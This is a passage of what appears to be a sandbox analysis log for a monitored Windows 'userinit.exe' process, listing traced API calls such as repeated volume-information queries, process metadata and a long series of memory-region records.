[0189.953] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.953] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.953] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e8a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.953] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.953] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e8a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.953] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0189.954] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.954] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.954] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.954] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.954] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.954] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.954] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.955] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.955] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.955] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.955] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.955] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.955] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.955] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.955] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.956] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.956] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12e994, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x12e9a8, lpMaximumComponentLength=0x12e9a4, lpFileSystemFlags=0x12e9a0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12e9a8*=0x90c08a66, lpMaximumComponentLength=0x12e9a4*=0xff, lpFileSystemFlags=0x12e9a0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0189.956] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e898, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0189.956] GetSystemDefaultLangID () returned 0x2e0409
[0189.956] VerLanguageNameA (in: wLang=0x409, szLang=0x12e94c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0189.957] ExitProcess (uExitCode=0x0)
Thread:
id = 297
os_tid = 0x81c
Thread:
id = 298
os_tid = 0x864
Process:
id = "49"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be900"
os_pid = "0x80c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5862
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5863
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5864
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5865
start_va = 0x50000
end_va = 0x8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5866
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5867
start_va = 0xcf0000
end_va = 0xcf8fff
entry_point = 0xcf0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5868
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5869
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5870
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5871
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 5872
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5873
start_va = 0x140000
end_va = 0x23ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 5874
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5875
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5876
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5877
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5878
start_va = 0x130000
end_va = 0x13ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 5879
start_va = 0x6d720000
end_va = 0x6d7a3fff
entry_point = 0x6d720000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5880
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5881
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5882
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5883
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5884
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5885
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5886
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5887
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5888
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5889
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5890
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5891
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5892
start_va = 0x240000
end_va = 0x307fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 5893
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5894
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5901
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5902
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 5903
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 5904
start_va = 0x6a0000
end_va = 0x6affff
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 5905
start_va = 0xd00000
end_va = 0x18fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d00000"
filename = ""
Region:
id = 5906
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 5907
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5908
start_va = 0x310000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 5911
start_va = 0x6b0000
end_va = 0x78efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 5912
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 5913
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5914
start_va = 0x790000
end_va = 0x9affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 5915
start_va = 0x1900000
end_va = 0x222ffff
entry_point = 0x1900000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5916
start_va = 0x120000
end_va = 0x126fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 5917
start_va = 0x350000
end_va = 0x351fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 5918
start_va = 0x2230000
end_va = 0x2622fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002230000"
filename = ""
Region:
id = 5919
start_va = 0x360000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 5920
start_va = 0x790000
end_va = 0x89cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 5921
start_va = 0x970000
end_va = 0x9affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000970000"
filename = ""
Region:
id = 5925
start_va = 0x9b0000
end_va = 0xaaffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 5929
start_va = 0xab0000
end_va = 0xcaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ab0000"
filename = ""
Region:
id = 5932
start_va = 0x8a0000
end_va = 0x920fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5933
start_va = 0x2630000
end_va = 0x26b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5934
start_va = 0x8a0000
end_va = 0x924fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5935
start_va = 0x2630000
end_va = 0x26b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5939
start_va = 0x8a0000
end_va = 0x928fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5940
start_va = 0x2630000
end_va = 0x26bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5941
start_va = 0x8a0000
end_va = 0x92cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5942
start_va = 0x2630000
end_va = 0x26befff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5946
start_va = 0x8a0000
end_va = 0x930fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5947
start_va = 0x2630000
end_va = 0x26c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5948
start_va = 0x8a0000
end_va = 0x934fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5949
start_va = 0x2630000
end_va = 0x26c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5950
start_va = 0x8a0000
end_va = 0x938fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5953
start_va = 0x2630000
end_va = 0x26cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5954
start_va = 0x8a0000
end_va = 0x93cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5955
start_va = 0x2630000
end_va = 0x26cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5959
start_va = 0x8a0000
end_va = 0x940fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5960
start_va = 0x2630000
end_va = 0x26d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5961
start_va = 0x8a0000
end_va = 0x944fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5962
start_va = 0x2630000
end_va = 0x26d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5963
start_va = 0x8a0000
end_va = 0x948fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5967
start_va = 0x2630000
end_va = 0x26dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5968
start_va = 0x8a0000
end_va = 0x94cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5969
start_va = 0x2630000
end_va = 0x26defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5978
start_va = 0x8a0000
end_va = 0x950fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5979
start_va = 0x2630000
end_va = 0x26e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5980
start_va = 0x8a0000
end_va = 0x954fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5981
start_va = 0x2630000
end_va = 0x26e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5991
start_va = 0x8a0000
end_va = 0x958fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5992
start_va = 0x2630000
end_va = 0x26eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5993
start_va = 0x8a0000
end_va = 0x95cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5994
start_va = 0x2630000
end_va = 0x26eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 5995
start_va = 0x8a0000
end_va = 0x960fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 5996
start_va = 0x2630000
end_va = 0x26f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6005
start_va = 0x8a0000
end_va = 0x964fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 6006
start_va = 0x2630000
end_va = 0x26f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6007
start_va = 0x8a0000
end_va = 0x968fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 6008
start_va = 0x2630000
end_va = 0x26fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6025
start_va = 0x8a0000
end_va = 0x96cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 6026
start_va = 0x2630000
end_va = 0x26fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6030
start_va = 0x2700000
end_va = 0x27d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 6031
start_va = 0x27e0000
end_va = 0x28b2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6032
start_va = 0x2630000
end_va = 0x2704fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6033
start_va = 0x2710000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6034
start_va = 0x2630000
end_va = 0x2708fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6035
start_va = 0x2710000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6036
start_va = 0x2630000
end_va = 0x270cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6037
start_va = 0x2710000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6038
start_va = 0x27f0000
end_va = 0x28d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 6039
start_va = 0x2630000
end_va = 0x2712fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6040
start_va = 0x2720000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6041
start_va = 0x2630000
end_va = 0x2716fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6042
start_va = 0x2720000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6043
start_va = 0x2630000
end_va = 0x271afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6044
start_va = 0x2720000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6045
start_va = 0x2630000
end_va = 0x271efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6046
start_va = 0x2720000
end_va = 0x2810fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6047
start_va = 0x2820000
end_va = 0x2912fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 6048
start_va = 0x2630000
end_va = 0x2724fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6049
start_va = 0x2730000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 6050
start_va = 0x2630000
end_va = 0x2728fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6051
start_va = 0x2730000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 6052
start_va = 0x2630000
end_va = 0x272cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6053
start_va = 0x2730000
end_va = 0x282efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 6054
start_va = 0x2830000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 6055
start_va = 0x2630000
end_va = 0x2732fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002630000"
filename = ""
Region:
id = 6056
start_va = 0x2740000
end_va = 0x2844fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
